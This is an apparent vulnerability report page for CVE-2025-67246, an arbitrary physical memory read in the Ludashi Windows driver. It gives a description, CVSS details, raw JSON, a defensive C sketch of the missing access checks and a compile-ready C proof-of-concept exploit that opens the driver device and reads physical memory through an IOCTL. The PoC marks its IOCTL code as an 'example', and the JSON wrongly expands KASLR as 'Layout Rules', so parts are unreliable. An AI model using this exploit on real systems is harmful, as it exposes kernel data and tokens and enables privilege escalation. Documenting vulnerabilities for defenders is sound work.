Security Vulnerability Report
CVE-2025-67246 CVSS 7.3 HIGH

CVE-2025-67246

Published: 2026-01-15 16:16:12
Last Modified: 2026-04-14 15:16:25

Description

A local information disclosure vulnerability exists in the Ludashi driver before 5.1025 due to a lack of access control in the IOCTL handler. This driver exposes a device interface accessible to a normal user and handles attacker-controlled structures containing the lower 4GB of physical addresses. The handler maps arbitrary physical memory via MmMapIoSpace and copies data back to user mode without verifying the caller's privileges or the target address range. This allows unprivileged users to read arbitrary physical memory, potentially exposing kernel data structures, kernel pointers, security tokens, and other sensitive information. This vulnerability can be further exploited to bypass Kernel Address Space Layout Randomization (KASLR) and achieve local privilege escalation.
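
The two checks the description says are missing (caller privilege and target address range), sketched in portable C as an added example. This is not Ludashi's code or its fix; the request layout, MAX_READ, the allow-list and the caller_is_admin flag are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical request layout; names are assumptions, not the vendor's. */
typedef struct { uint64_t phys_addr; uint32_t size; } phys_read_req;

/* A physical range the driver legitimately owns (e.g. its device's MMIO). */
typedef struct { uint64_t base; uint64_t length; } phys_range;

#define MAX_READ 0x1000u /* assumed per-request cap */

/* True only if [addr, addr+size) lies wholly inside one allow-listed range.
 * addr+size is never computed, so a huge addr cannot wrap past the check. */
static bool range_allowed(const phys_range *allow, size_t n,
                          uint64_t addr, uint32_t size)
{
    for (size_t i = 0; i < n; i++) {
        if (addr < allow[i].base)
            continue;
        uint64_t off = addr - allow[i].base;
        if (off < allow[i].length && size <= allow[i].length - off)
            return true;
    }
    return false;
}

/* Gate to run before any mapping call. caller_is_admin stands in for the
 * kernel-side control (restrictive device ACL or an explicit privilege check). */
bool validate_phys_read(const phys_read_req *req, size_t in_len, size_t out_len,
                        bool caller_is_admin, const phys_range *allow, size_t n)
{
    if (!caller_is_admin)
        return false;                       /* caller privilege */
    if (req == NULL || in_len < sizeof(*req))
        return false;                       /* input buffer too short */
    if (req->size == 0 || req->size > MAX_READ || out_len < req->size)
        return false;                       /* length bounds */
    return range_allowed(allow, n, req->phys_addr, req->size);
}

int main(void)
{
    phys_range allow[] = { { 0xFED00000ull, 0x1000 } };   /* constructed */
    phys_read_req in = { 0xFED00000ull, 0x100 }, out = { 0x1000, 0x100 };
    printf("inside allow-list:  %d\n", validate_phys_read(&in, sizeof in, 0x1000, true, allow, 1));
    printf("outside allow-list: %d\n", validate_phys_read(&out, sizeof out, 0x1000, true, allow, 1));
    return 0;
}
```

In a real Windows driver the privilege gate would normally be enforced by the device object's security descriptor (for example via IoCreateDeviceSecure) rather than a flag passed to the handler.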

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ludashi:ludashi_driver:*:*:*:*:*:*:*:* - VULNERABLE
Ludashi Driver < 5.1025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-67246 PoC - Ludashi Driver Local Privilege Escalation
 * This PoC demonstrates reading arbitrary physical memory via Ludashi driver.
 * Compile: gcc -o cve_poc cve_poc.c -ladvapi32
 * Author: CVE-Publication
 */
#include <windows.h>
#include <stdio.h>
#include <stdint.h>

#define LUDASHI_DEVICE_NAME "\\\\.\\LudashiDevice"
#define IOCTL_READ_PHYSICAL_MEMORY 0x9C402400 // Example IOCTL code

typedef struct _PHYSICAL_MEMORY_REQUEST {
    uint64_t PhysicalAddress;
    uint32_t Size;
    uint8_t Buffer[1];
} PHYSICAL_MEMORY_REQUEST, *PPHYSICAL_MEMORY_REQUEST;

int main() {
    HANDLE hDevice;
    DWORD bytesReturned = 0;
    uint8_t readBuffer[0x1000];
    PHYSICAL_MEMORY_REQUEST request;
    BOOL success;

    printf("[*] CVE-2025-67246 PoC - Ludashi Driver Physical Memory Read\n");
    printf("[*] Opening Ludashi device...\n");

    hDevice = CreateFileA(
        LUDASHI_DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device. Error: %lu\n", GetLastError());
        return 1;
    }

    printf("[+] Device opened successfully.\n");

    // Read from physical address 0x1000 (arbitrary example)
    request.PhysicalAddress = 0x1000;
    request.Size = 0x100;

    printf("[*] Sending IOCTL request to read physical address: 0x%llx\n", request.PhysicalAddress);

    success = DeviceIoControl(
        hDevice,
        IOCTL_READ_PHYSICAL_MEMORY,
        &request,
        sizeof(request),
        readBuffer,
        sizeof(readBuffer),
        &bytesReturned,
        NULL
    );

    if (success && bytesReturned > 0) {
        printf("[+] Successfully read %lu bytes from physical memory!\n", bytesReturned);
        printf("[*] First 32 bytes of data:\n");
        for (int i = 0; i < 32 && i < bytesReturned; i++) {
            printf("%02X ", readBuffer[i]);
            if ((i + 1) % 16 == 0) printf("\n");
        }
        printf("\n");
    } else {
        printf("[-] Failed to read physical memory. Error: %lu\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67246", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:12.450", "lastModified": "2026-04-14T15:16:25.140", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A local information disclosure vulnerability exists in the Ludashi driver before 5.1025 due to a lack of access control in the IOCTL handler. This driver exposes a device interface accessible to a normal user and handles attacker-controlled structures containing the lower 4GB of physical addresses. The handler maps arbitrary physical memory via MmMapIoSpace and copies data back to user mode without verifying the caller's privileges or the target address range. This allows unprivileged users to read arbitrary physical memory, potentially exposing kernel data structures, kernel pointers, security tokens, and other sensitive information. This vulnerability can be further exploited to bypass the Kernel Address Space Layout Rules (KASLR) and achieve local privilege escalation."}, {"lang": "es", "value": "Una vulnerabilidad de revelación de información local existe en el controlador Ludashi anterior a la versión 5.1025 debido a una falta de control de acceso en el controlador IOCTL. Este controlador expone una interfaz de dispositivo accesible para un usuario normal y maneja estructuras controladas por el atacante que contienen los 4 GB inferiores de direcciones físicas. El controlador mapea memoria física arbitraria a través de MmMapIoSpace y copia datos de vuelta al modo de usuario sin verificar los privilegios del llamador o el rango de direcciones objetivo. Esto permite a usuarios sin privilegios leer memoria física arbitraria, exponiendo potencialmente estructuras de datos del kernel, punteros del kernel, tokens de seguridad y otra información sensible. 
Esta vulnerabilidad puede ser explotada aún más para eludir las Reglas de Diseño del Espacio de Direcciones del Kernel (KASLR) y lograr una escalada de privilegios local."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ludashi:ludashi_driver:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.1025", "matchCriteriaId": "63FA880E-9340-4A37-909B-FE3DFB2413AB"}]}]}], "references": [{"url": "http://ludashi.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/CDipper/CVE-2025-67246", "source": "[email protected]"}, {"url": "https://github.com/CDipper/CVE-Publication", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}